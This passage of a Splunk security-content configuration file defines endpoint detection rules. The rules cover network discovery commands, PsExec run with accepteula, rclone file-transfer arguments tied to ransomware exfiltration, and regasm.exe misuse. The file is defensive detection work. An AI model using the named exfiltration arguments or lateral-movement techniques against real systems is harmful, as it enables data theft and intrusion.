ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is uncommon for normal users to execute a series of commands used for network discovery. System administrators often use scripts to execute these commands. These can generate false positives. action.escu.creation_date = 2020-11-10 action.escu.modification_date = 2020-11-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect processes used for System Network Configuration Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning multiple $process_name$ was identified on endpoint $dest$ by user $user$ typically not a normal behavior of the process. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 32}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 32}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 32}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 32}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect processes used for System Network Configuration Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes"], "cis20": ["CIS 10"], "confidence": 80, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for fast execution of processes used for system network configuration discovery on the endpoint. action.notable.param.rule_title = Detect processes used for System Network Configuration Discovery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where NOT Processes.user IN ("","unknown") by Processes.dest Processes.process_name Processes.parent_process_name Processes.user _time | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | search `system_network_configuration_discovery_tools` | transaction dest connected=false maxpause=5m |where eventcount>=5 | table firstTime lastTime dest user process_name process parent_process parent_process_name eventcount | `detect_processes_used_for_system_network_configuration_discovery_filter` [ESCU - Detect Prohibited Applications Spawning cmd exe - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for executions of cmd.exe spawned by a process that is often abused by attackers and that does not typically launch cmd.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for executions of cmd.exe spawned by a process that is often abused by attackers and that does not typically launch cmd.exe. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = There are circumstances where an application may legitimately execute and interact with the Windows command-line interface. Investigate and modify the lookup file, as appropriate. action.escu.creation_date = 2020-11-10 action.escu.modification_date = 2020-11-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Prohibited Applications Spawning cmd exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Command-Line Executions", "Suspicious MSHTA Activity", "Suspicious Zoom Child Processes", "NOBELIUM Group"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Prohibited Applications Spawning cmd exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions", "Suspicious MSHTA Activity", "Suspicious Zoom Child Processes", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` by Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.dest Processes.user| `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` |search [`prohibited_apps_launching_cmd`] | `detect_prohibited_applications_spawning_cmd_exe_filter` [ESCU - Detect PsExec With accepteula Flag - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for events where `PsExec.exe` is run with the `accepteula` flag in the command line. PsExec is a built-in Windows utility that enables you to execute processes on other systems. It is fully interactive for console applications. This tool is widely used for launching interactive command prompts on remote systems. Threat actors leverage this extensively for executing code on compromised systems. If an attacker is running PsExec for the first time, they will be prompted to accept the end-user license agreement (EULA), which can be passed as the argument `accepteula` within the command line. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for events where `PsExec.exe` is run with the `accepteula` flag in the command line. PsExec is a built-in Windows utility that enables you to execute processes on other systems. It is fully interactive for console applications. This tool is widely used for launching interactive command prompts on remote systems. Threat actors leverage this extensively for executing code on compromised systems. If an attacker is running PsExec for the first time, they will be prompted to accept the end-user license agreement (EULA), which can be passed as the argument `accepteula` within the command line. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators can leverage PsExec for accessing remote systems and might pass `accepteula` as an argument if they are running this tool for the first time. However, it is not likely that you'd see multiple occurrences of this event on a machine action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect PsExec With accepteula Flag - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware", "DHS Report TA18-074A", "HAFNIUM Group", "DarkSide Ransomware", "Active Directory Lateral Movement", "CISA AA22-320A", "Sandworm Tools", "Volt Typhoon", "IcedID", "BlackByte Ransomware", "DarkGate Malware", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ running the utility for possibly the first time. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect PsExec With accepteula Flag - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware", "DHS Report TA18-074A", "HAFNIUM Group", "DarkSide Ransomware", "Active Directory Lateral Movement", "CISA AA22-320A", "Sandworm Tools", "Volt Typhoon", "IcedID", "BlackByte Ransomware", "DarkGate Malware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for events where `PsExec.exe` is run with the `accepteula` flag in the command line. PsExec is a built-in Windows utility that enables you to execute processes on other systems. It is fully interactive for console applications. This tool is widely used for launching interactive command prompts on remote systems. Threat actors leverage this extensively for executing code on compromised systems. If an attacker is running PsExec for the first time, they will be prompted to accept the end-user license agreement (EULA), which can be passed as the argument `accepteula` within the command line. action.notable.param.rule_title = Detect PsExec With accepteula Flag action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_psexec` Processes.process=*accepteula* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)`| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_psexec_with_accepteula_flag_filter` [ESCU - Detect Rare Executables - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search will return a table of processes in the a given window, remove process names which are in the allowed list and list out the top 30 rare processes discovered on different hosts. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search will return a table of processes in the a given window, remove process names which are in the allowed list and list out the top 30 rare processes discovered on different hosts. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some legitimate processes may be only rarely executed in your environment. As these are identified, update `rare_process_allow_list_local.csv` to filter them out of your search results. action.escu.creation_date = 2022-11-10 action.escu.modification_date = 2022-11-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Rare Executables - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Rare Executables - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.dest) as dest values(Processes.user) as user min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.process_name | rename Processes.process_name as process | `filter_rare_process_allow_list` | sort count | head 30 | rex field=user "(?.*)\\\\(?.*)" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rare_executables_filter` [ESCU - Detect RClone Command-Line Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies commonly used command-line arguments used by `rclone.exe` to initiate a file transfer. Some arguments were negated as they are specific to the configuration used by adversaries. In particular, an adversary may list the files or directories of the remote file share using `ls` or `lsd`, which is not indicative of malicious behavior. During triage, at this stage of a ransomware event, exfiltration is about to occur or has already. Isolate the endpoint and continue investigating by review file modifications and parallel processes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1020"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies commonly used command-line arguments used by `rclone.exe` to initiate a file transfer. Some arguments were negated as they are specific to the configuration used by adversaries. In particular, an adversary may list the files or directories of the remote file share using `ls` or `lsd`, which is not indicative of malicious behavior. During triage, at this stage of a ransomware event, exfiltration is about to occur or has already. Isolate the endpoint and continue investigating by review file modifications and parallel processes. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as this is restricted to the Rclone process name. Filter or tune the analytic as needed. action.escu.creation_date = 2021-11-29 action.escu.modification_date = 2021-11-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect RClone Command-Line Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkSide Ransomware", "Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to connect to a remote cloud service to move files or folders. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect RClone Command-Line Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1020"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies commonly used command-line arguments used by `rclone.exe` to initiate a file transfer. Some arguments were negated as they are specific to the configuration used by adversaries. In particular, an adversary may list the files or directories of the remote file share using `ls` or `lsd`, which is not indicative of malicious behavior. During triage, at this stage of a ransomware event, exfiltration is about to occur or has already. Isolate the endpoint and continue investigating by review file modifications and parallel processes. action.notable.param.rule_title = Detect RClone Command-Line Usage action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rclone` Processes.process IN ("*copy*", "*mega*", "*pcloud*", "*ftp*", "*--config*", "*--progress*", "*--no-check-certificate*", "*--ignore-existing*", "*--auto-confirm*", "*--transfers*", "*--multi-thread-streams*") by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rclone_command_line_usage_filter` [ESCU - Detect Regasm Spawning a Process - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies regasm.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies regasm.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, limited instances of regasm.exe or regsvcs.exe may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Regasm Spawning a Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land", "DarkGate Malware", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ spawning a child process, typically not normal behavior for $parent_process_name$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Regasm Spawning a Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land", "DarkGate Malware", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies regasm.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.notable.param.rule_title = Detect Regasm Spawning a Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regasm.exe by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_spawning_a_process_filter` [ESCU - Detect Regasm with Network Connection - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies regasm.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies regasm.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = Although unlikely, limited instances of regasm.exe with a network connection may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage. action.escu.creation_date = 2024-01-30 action.escu.modification_date = 2024-01-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Regasm with Network Connection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ contacting a remote destination was identified on endpoint $dest$ by user $user$. This behavior is not normal for $process_name$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Regasm with Network Connection - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies regasm.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.notable.param.rule_title = Detect Regasm with Network Connection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=3 dest_ip!=10.0.0.0/8 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regasm.exe | stats count min(_time) as firstTime max(_time) as lastTime by dest, user, process_name, src_ip, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_with_network_connection_filter` [ESCU - Detect Regasm with no Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies regasm.exe with no command line arguments. This particular behavior occurs when another process injects into regasm.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in `C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe` and `C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe`. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies regasm.exe with no command line arguments. This particular behavior occurs when another process injects into regasm.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in `C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe` and `C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe`. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, limited instances of regasm.exe or may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage. action.escu.creation_date = 2022-03-15 action.escu.modification_date = 2022-03-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Regasm with no Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = The process $process_name$ was spawned by $parent_process_name$ without any command-line arguments on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Regasm with no Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies regasm.exe with no command line arguments. This particular behavior occurs when another process injects into regasm.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in `C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe` and `C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe`. action.notable.param.rule_title = Detect Regasm with no Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_regasm` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex 